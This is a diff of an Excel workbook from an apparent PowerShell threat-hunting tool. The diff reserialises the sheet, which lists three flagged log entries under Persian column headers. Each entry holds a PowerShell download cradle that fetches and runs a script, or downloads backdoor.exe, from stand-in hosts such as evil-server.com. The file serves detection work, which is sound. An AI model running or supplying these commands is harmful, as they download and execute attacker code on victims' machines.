--- a/output/suspicious_logs.xlsx
+++ b/output/suspicious_logs.xlsx
@@ -1,145 +1,60 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
-<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="30228"/>
+<workbook xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
   <workbookPr/>
-  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\Lenovo\Desktop\powershell_hunting\output\"/>
-    </mc:Choice>
-  </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="11_2B59BAD790BD9C41D9EB02F1571850737B1FFE50" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <workbookProtection/>
   <bookViews>
-    <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView visibility="visible" minimized="0" showHorizontalScroll="1" showVerticalScroll="1" showSheetTabs="1" tabRatio="600" firstSheet="0" activeTab="0" autoFilterDateGrouping="1"/>
   </bookViews>
   <sheets>
-    <sheet name="PowerShell Hunting Results" sheetId="1" r:id="rId1"/>
+    <sheet name="PowerShell Hunting Results" sheetId="1" state="visible" r:id="rId1"/>
   </sheets>
   <definedNames>
     <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'PowerShell Hunting Results'!$A$1:$H$4</definedName>
   </definedNames>
-  <calcPr calcId="0"/>
+  <calcPr calcId="124519" fullCalcOnLoad="1"/>
 </workbook>
 </file>
 
-<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="29" uniqueCount="25">
-  <si>
-    <t>ردیف</t>
-  </si>
-  <si>
-    <t>زمان</t>
-  </si>
-  <si>
-    <t>دستگاه</t>
-  </si>
-  <si>
-    <t>کاربر</t>
-  </si>
-  <si>
-    <t>دستور کامل</t>
-  </si>
-  <si>
-    <t>فرایند والد</t>
-  </si>
-  <si>
-    <t>IP خارجی</t>
-  </si>
-  <si>
-    <t>وضعیت</t>
-  </si>
-  <si>
-    <t>2026-09-01 11:45:00</t>
-  </si>
-  <si>
-    <t>PC-REZA</t>
-  </si>
-  <si>
-    <t>Reza.Karimi</t>
-  </si>
-  <si>
-    <t>powershell -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil-server.com/script.ps1')</t>
-  </si>
-  <si>
-    <t>winlogon.exe</t>
-  </si>
-  <si>
-    <t>94.102.61.78</t>
-  </si>
-  <si>
-    <t>⚠️ مشکوک (IP خارجی)</t>
-  </si>
-  <si>
-    <t>2026-09-01 10:45:00</t>
-  </si>
-  <si>
-    <t>PC-MOHAMMAD</t>
-  </si>
-  <si>
-    <t>Ali.Rezaei</t>
-  </si>
-  <si>
-    <t>powershell -Command $client = new-object System.Net.WebClient; $client.DownloadFile('http://bad-site.com/backdoor.exe', 'C:\\temp\\backdoor.exe')</t>
-  </si>
-  <si>
-    <t>powershell -Command ...</t>
-  </si>
-  <si>
-    <t>45.33.22.11</t>
-  </si>
-  <si>
-    <t>2026-09-01 08:15:00</t>
-  </si>
-  <si>
-    <t>powershell -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')</t>
-  </si>
-  <si>
-    <t>cmd.exe /c powershell -Command ...</t>
-  </si>
-  <si>
-    <t>185.220.101.23</t>
-  </si>
-</sst>
-</file>
-
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <numFmts count="0"/>
   <fonts count="3">
     <font>
-      <sz val="11"/>
-      <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
+      <color theme="1"/>
+      <sz val="11"/>
       <scheme val="minor"/>
     </font>
     <font>
-      <b/>
+      <name val="B Nazanin"/>
+      <b val="1"/>
+      <color rgb="00FFFFFF"/>
       <sz val="12"/>
-      <color rgb="FFFFFFFF"/>
-      <name val="B Nazanin"/>
     </font>
     <font>
+      <name val="B Nazanin"/>
       <sz val="10"/>
-      <name val="B Nazanin"/>
     </font>
   </fonts>
   <fills count="4">
     <fill>
-      <patternFill patternType="none"/>
+      <patternFill/>
     </fill>
     <fill>
       <patternFill patternType="gray125"/>
     </fill>
     <fill>
       <patternFill patternType="solid">
-        <fgColor rgb="FF4472C4"/>
-        <bgColor rgb="FF4472C4"/>
+        <fgColor rgb="004472C4"/>
+        <bgColor rgb="004472C4"/>
       </patternFill>
     </fill>
     <fill>
       <patternFill patternType="solid">
-        <fgColor rgb="FFFFC000"/>
-        <bgColor rgb="FFFFC000"/>
+        <fgColor rgb="00FFC000"/>
+        <bgColor rgb="00FFC000"/>
       </patternFill>
     </fill>
   </fills>
@@ -152,52 +67,102 @@
       <diagonal/>
     </border>
     <border>
-      <left style="thin">
-        <color auto="1"/>
-      </left>
-      <right style="thin">
-        <color auto="1"/>
-      </right>
-      <top style="thin">
-        <color auto="1"/>
-      </top>
-      <bottom style="thin">
-        <color auto="1"/>
-      </bottom>
-      <diagonal/>
+      <left style="thin"/>
+      <right style="thin"/>
+      <top style="thin"/>
+      <bottom style="thin"/>
     </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
   <cellXfs count="5">
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
-    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" pivotButton="0" quotePrefix="0" xfId="0"/>
+    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
       <alignment horizontal="center" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
       <alignment horizontal="center" vertical="center"/>
     </xf>
-    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
       <alignment horizontal="center" vertical="center"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
-    <cellStyle name="Normal" xfId="0" builtinId="0"/>
+    <cellStyle name="Normal" xfId="0" builtinId="0" hidden="0"/>
   </cellStyles>
-  <dxfs count="0"/>
   <tableStyles count="0" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16"/>
-  <extLst>
-    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{EB79DEF2-80B8-43e5-95BD-54CBDDF9020C}">
-      <x14:slicerStyles defaultSlicerStyle="SlicerStyleLight1"/>
-    </ext>
-    <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{9260A510-F301-46a8-8635-F512D64BE5F5}">
-      <x15:timelineStyles defaultTimelineStyle="TimeSlicerStyleLight1"/>
-    </ext>
-  </extLst>
+  <colors>
+    <indexedColors>
+      <rgbColor rgb="00000000"/>
+      <rgbColor rgb="00FFFFFF"/>
+      <rgbColor rgb="00FF0000"/>
+      <rgbColor rgb="0000FF00"/>
+      <rgbColor rgb="000000FF"/>
+      <rgbColor rgb="00FFFF00"/>
+      <rgbColor rgb="00FF00FF"/>
+      <rgbColor rgb="0000FFFF"/>
+      <rgbColor rgb="00000000"/>
+      <rgbColor rgb="00FFFFFF"/>
+      <rgbColor rgb="00FF0000"/>
+      <rgbColor rgb="0000FF00"/>
+      <rgbColor rgb="000000FF"/>
+      <rgbColor rgb="00FFFF00"/>
+      <rgbColor rgb="00FF00FF"/>
+      <rgbColor rgb="0000FFFF"/>
+      <rgbColor rgb="00800000"/>
+      <rgbColor rgb="00008000"/>
+      <rgbColor rgb="00000080"/>
+      <rgbColor rgb="00808000"/>
+      <rgbColor rgb="00800080"/>
+      <rgbColor rgb="00008080"/>
+      <rgbColor rgb="00C0C0C0"/>
+      <rgbColor rgb="00808080"/>
+      <rgbColor rgb="009999FF"/>
+      <rgbColor rgb="00993366"/>
+      <rgbColor rgb="00FFFFCC"/>
+      <rgbColor rgb="00CCFFFF"/>
+      <rgbColor rgb="00660066"/>
+      <rgbColor rgb="00FF8080"/>
+      <rgbColor rgb="000066CC"/>
+      <rgbColor rgb="00CCCCFF"/>
+      <rgbColor rgb="00000080"/>
+      <rgbColor rgb="00FF00FF"/>
+      <rgbColor rgb="00FFFF00"/>
+      <rgbColor rgb="0000FFFF"/>
+      <rgbColor rgb="00800080"/>
+      <rgbColor rgb="00800000"/>
+      <rgbColor rgb="00008080"/>
+      <rgbColor rgb="000000FF"/>
+      <rgbColor rgb="0000CCFF"/>
+      <rgbColor rgb="00CCFFFF"/>
+      <rgbColor rgb="00CCFFCC"/>
+      <rgbColor rgb="00FFFF99"/>
+      <rgbColor rgb="0099CCFF"/>
+      <rgbColor rgb="00FF99CC"/>
+      <rgbColor rgb="00CC99FF"/>
+      <rgbColor rgb="00FFCC99"/>
+      <rgbColor rgb="003366FF"/>
+      <rgbColor rgb="0033CCCC"/>
+      <rgbColor rgb="0099CC00"/>
+      <rgbColor rgb="00FFCC00"/>
+      <rgbColor rgb="00FF9900"/>
+      <rgbColor rgb="00FF6600"/>
+      <rgbColor rgb="00666699"/>
+      <rgbColor rgb="00969696"/>
+      <rgbColor rgb="00003366"/>
+      <rgbColor rgb="00339966"/>
+      <rgbColor rgb="00003300"/>
+      <rgbColor rgb="00333300"/>
+      <rgbColor rgb="00993300"/>
+      <rgbColor rgb="00993366"/>
+      <rgbColor rgb="00333399"/>
+      <rgbColor rgb="00333333"/>
+    </indexedColors>
+  </colors>
 </styleSheet>
 </file>
 
@@ -485,125 +450,188 @@
 </file>
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
+  <sheetPr>
+    <outlinePr summaryBelow="1" summaryRight="1"/>
+    <pageSetUpPr/>
+  </sheetPr>
   <dimension ref="A1:H4"/>
-  <sheetFormatPr defaultRowHeight="15"/>
+  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
   <cols>
-    <col min="1" max="1" width="8" customWidth="1"/>
-    <col min="2" max="2" width="22" customWidth="1"/>
-    <col min="3" max="4" width="18" customWidth="1"/>
-    <col min="5" max="5" width="80" customWidth="1"/>
-    <col min="6" max="6" width="40" customWidth="1"/>
-    <col min="7" max="7" width="18" customWidth="1"/>
-    <col min="8" max="8" width="25" customWidth="1"/>
+    <col width="8" customWidth="1" min="1" max="1"/>
+    <col width="22" customWidth="1" min="2" max="2"/>
+    <col width="18" customWidth="1" min="3" max="3"/>
+    <col width="18" customWidth="1" min="4" max="4"/>
+    <col width="80" customWidth="1" min="5" max="5"/>
+    <col width="40" customWidth="1" min="6" max="6"/>
+    <col width="18" customWidth="1" min="7" max="7"/>
+    <col width="25" customWidth="1" min="8" max="8"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:8" ht="30" customHeight="1">
-      <c r="A1" s="1" t="s">
-        <v>0</v>
-      </c>
-      <c r="B1" s="1" t="s">
+    <row r="1" ht="30" customHeight="1">
+      <c r="A1" s="1" t="inlineStr">
+        <is>
+          <t>ردیف</t>
+        </is>
+      </c>
+      <c r="B1" s="1" t="inlineStr">
+        <is>
+          <t>زمان</t>
+        </is>
+      </c>
+      <c r="C1" s="1" t="inlineStr">
+        <is>
+          <t>دستگاه</t>
+        </is>
+      </c>
+      <c r="D1" s="1" t="inlineStr">
+        <is>
+          <t>کاربر</t>
+        </is>
+      </c>
+      <c r="E1" s="1" t="inlineStr">
+        <is>
+          <t>دستور کامل</t>
+        </is>
+      </c>
+      <c r="F1" s="1" t="inlineStr">
+        <is>
+          <t>فرایند والد</t>
+        </is>
+      </c>
+      <c r="G1" s="1" t="inlineStr">
+        <is>
+          <t>IP خارجی</t>
+        </is>
+      </c>
+      <c r="H1" s="1" t="inlineStr">
+        <is>
+          <t>وضعیت</t>
+        </is>
+      </c>
+    </row>
+    <row r="2">
+      <c r="A2" s="2" t="n">
         <v>1</v>
       </c>
-      <c r="C1" s="1" t="s">
+      <c r="B2" s="3" t="inlineStr">
+        <is>
+          <t>2026-09-01 11:45:00</t>
+        </is>
+      </c>
+      <c r="C2" s="3" t="inlineStr">
+        <is>
+          <t>PC-REZA</t>
+        </is>
+      </c>
+      <c r="D2" s="3" t="inlineStr">
+        <is>
+          <t>Reza.Karimi</t>
+        </is>
+      </c>
+      <c r="E2" s="3" t="inlineStr">
+        <is>
+          <t>powershell -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://evil-server.com/script.ps1')</t>
+        </is>
+      </c>
+      <c r="F2" s="3" t="inlineStr">
+        <is>
+          <t>winlogon.exe</t>
+        </is>
+      </c>
+      <c r="G2" s="3" t="inlineStr">
+        <is>
+          <t>94.102.61.78</t>
+        </is>
+      </c>
+      <c r="H2" s="4" t="inlineStr">
+        <is>
+          <t>⚠️ مشکوک (IP خارجی)</t>
+        </is>
+      </c>
+    </row>
+    <row r="3">
+      <c r="A3" s="2" t="n">
         <v>2</v>
       </c>
-      <c r="D1" s="1" t="s">
+      <c r="B3" s="3" t="inlineStr">
+        <is>
+          <t>2026-09-01 10:45:00</t>
+        </is>
+      </c>
+      <c r="C3" s="3" t="inlineStr">
+        <is>
+          <t>PC-MOHAMMAD</t>
+        </is>
+      </c>
+      <c r="D3" s="3" t="inlineStr">
+        <is>
+          <t>Ali.Rezaei</t>
+        </is>
+      </c>
+      <c r="E3" s="3" t="inlineStr">
+        <is>
+          <t>powershell -Command $client = new-object System.Net.WebClient; $client.DownloadFile('http://bad-site.com/backdoor.exe', 'C:\\temp\\backdoor.exe')</t>
+        </is>
+      </c>
+      <c r="F3" s="3" t="inlineStr">
+        <is>
+          <t>powershell -Command ...</t>
+        </is>
+      </c>
+      <c r="G3" s="3" t="inlineStr">
+        <is>
+          <t>45.33.22.11</t>
+        </is>
+      </c>
+      <c r="H3" s="4" t="inlineStr">
+        <is>
+          <t>⚠️ مشکوک (IP خارجی)</t>
+        </is>
+      </c>
+    </row>
+    <row r="4">
+      <c r="A4" s="2" t="n">
         <v>3</v>
       </c>
-      <c r="E1" s="1" t="s">
-        <v>4</v>
-      </c>
-      <c r="F1" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="G1" s="1" t="s">
-        <v>6</v>
-      </c>
-      <c r="H1" s="1" t="s">
-        <v>7</v>
-      </c>
-    </row>
-    <row r="2" spans="1:8" ht="25.5">
-      <c r="A2" s="2">
-        <v>1</v>
-      </c>
-      <c r="B2" s="3" t="s">
-        <v>8</v>
-      </c>
-      <c r="C2" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="D2" s="3" t="s">
-        <v>10</v>
-      </c>
-      <c r="E2" s="3" t="s">
-        <v>11</v>
-      </c>
-      <c r="F2" s="3" t="s">
-        <v>12</v>
-      </c>
-      <c r="G2" s="3" t="s">
-        <v>13</v>
-      </c>
-      <c r="H2" s="4" t="s">
-        <v>14</v>
-      </c>
-    </row>
-    <row r="3" spans="1:8" ht="25.5">
-      <c r="A3" s="2">
-        <v>2</v>
-      </c>
-      <c r="B3" s="3" t="s">
-        <v>15</v>
-      </c>
-      <c r="C3" s="3" t="s">
-        <v>16</v>
-      </c>
-      <c r="D3" s="3" t="s">
-        <v>17</v>
-      </c>
-      <c r="E3" s="3" t="s">
-        <v>18</v>
-      </c>
-      <c r="F3" s="3" t="s">
-        <v>19</v>
-      </c>
-      <c r="G3" s="3" t="s">
-        <v>20</v>
-      </c>
-      <c r="H3" s="4" t="s">
-        <v>14</v>
-      </c>
-    </row>
-    <row r="4" spans="1:8" ht="25.5">
-      <c r="A4" s="2">
-        <v>3</v>
-      </c>
-      <c r="B4" s="3" t="s">
-        <v>21</v>
-      </c>
-      <c r="C4" s="3" t="s">
-        <v>16</v>
-      </c>
-      <c r="D4" s="3" t="s">
-        <v>17</v>
-      </c>
-      <c r="E4" s="3" t="s">
-        <v>22</v>
-      </c>
-      <c r="F4" s="3" t="s">
-        <v>23</v>
-      </c>
-      <c r="G4" s="3" t="s">
-        <v>24</v>
-      </c>
-      <c r="H4" s="4" t="s">
-        <v>14</v>
+      <c r="B4" s="3" t="inlineStr">
+        <is>
+          <t>2026-09-01 08:15:00</t>
+        </is>
+      </c>
+      <c r="C4" s="3" t="inlineStr">
+        <is>
+          <t>PC-MOHAMMAD</t>
+        </is>
+      </c>
+      <c r="D4" s="3" t="inlineStr">
+        <is>
+          <t>Ali.Rezaei</t>
+        </is>
+      </c>
+      <c r="E4" s="3" t="inlineStr">
+        <is>
+          <t>powershell -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')</t>
+        </is>
+      </c>
+      <c r="F4" s="3" t="inlineStr">
+        <is>
+          <t>cmd.exe /c powershell -Command ...</t>
+        </is>
+      </c>
+      <c r="G4" s="3" t="inlineStr">
+        <is>
+          <t>185.220.101.23</t>
+        </is>
+      </c>
+      <c r="H4" s="4" t="inlineStr">
+        <is>
+          <t>⚠️ مشکوک (IP خارجی)</t>
+        </is>
       </c>
     </row>
   </sheetData>
-  <autoFilter ref="A1:H4" xr:uid="{00000000-0009-0000-0000-000000000000}"/>
+  <autoFilter ref="A1:H4"/>
   <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
 </worksheet>
 </file>